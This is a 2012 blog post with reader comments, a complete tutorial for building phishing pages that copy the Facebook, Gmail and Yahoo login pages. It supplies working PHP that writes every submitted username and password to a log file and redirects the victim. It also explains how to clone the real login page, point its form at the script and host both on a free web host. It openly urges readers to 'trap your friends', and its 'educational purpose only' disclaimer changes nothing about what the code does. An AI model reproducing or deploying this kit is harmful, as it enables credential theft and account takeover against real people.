Tuesday, September 4, 2012

How To Create Phishing Page For Facebook, Gmail, Yahoo


What is phishing?
The method in which the user receives a message with a link directing them to a fake phishing website which has the same look and feel as the legitimate website. If the user doesn’t look at the URL, it may be hard to tell the difference between the fake and legitimate websites. Then, the user is asked to provide personal information on the page for example username and password.
How to create Phishing Page For Facebook, Gmail, Yahoo :

1) Requirements :
(a) Fake Login Page
(b) getLoginDetails Page
(c) Free Web Hosting Account
2) How To Create Fake Login Page :
a) Open the www.facebook.com/login.php or login page for which you want to create a phishing page.
b) Save the page on desktop as .html
phishing page


3) How to create getLoginDetail page :
a) Open the notepad and paste the following code.
<?php
header ('Location: http://techehub.blogspot.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
b) 2nd line i.e. “Location” is that where you want to redirect your victim. If you want to redirect it to facebook  then change it to “https://www.facebook.com/login.php?login_attempt=1” 
c) Save the file as getLoginDetails.php 
4) Free Web Hosting : 
a) You have to upload these two pages to a free web hosting site. I recommend to use 000webhost as it is free and also supports the php files.
b) Login to your account and choose file manager to upload file. 
c) Upload pages under the public_html dir
d) After uploading these two page you will get the url for those page. It looks something like www.your-website-name.net63.net/login and www.your-website-name.net63.net/getLoginDetails.php
5) Final step :
a) Open the login.html(uploaded in 000webhost) in notepad.
b) Find the string “action”(using ctrl+f), you will see something like action=https://www.facebook.com/login.php?login_attempt=1
c) Replace the https://www.facebook.com/login.php?login_attempt=1  with your getloginDetail page url like www.your-website-name.net63.net/getloginDetails.php and save the page.
d) Now open the www.your-website-name.net63.net/login, it look like a real facebook login page. Enter the username and password and you will notice that a log.txt file is created in your webhosting account. It contain the username and password.
e) Use this link to trap your friends and get their username and password. Thats it. Done !
Note : Hacking is a crime. Do not use this tutorial to hack innocent people. I am sharing this tutorial for educational purpose only. I will not responsible for any damage done by you. 

13 comments:

  1. my account disabled on 000webhost.com due to hacking/phshing....why????????????????/

    ReplyDelete
  2. Your account disabled on 000webhost.com due to hacking/phishing....

    ReplyDelete
  3. Thank you for the information, I think this article is very useful for all who read it.
    .

    ReplyDelete
  4. Thank you for the information, I think this article is very useful for all who read it.
    .

    ReplyDelete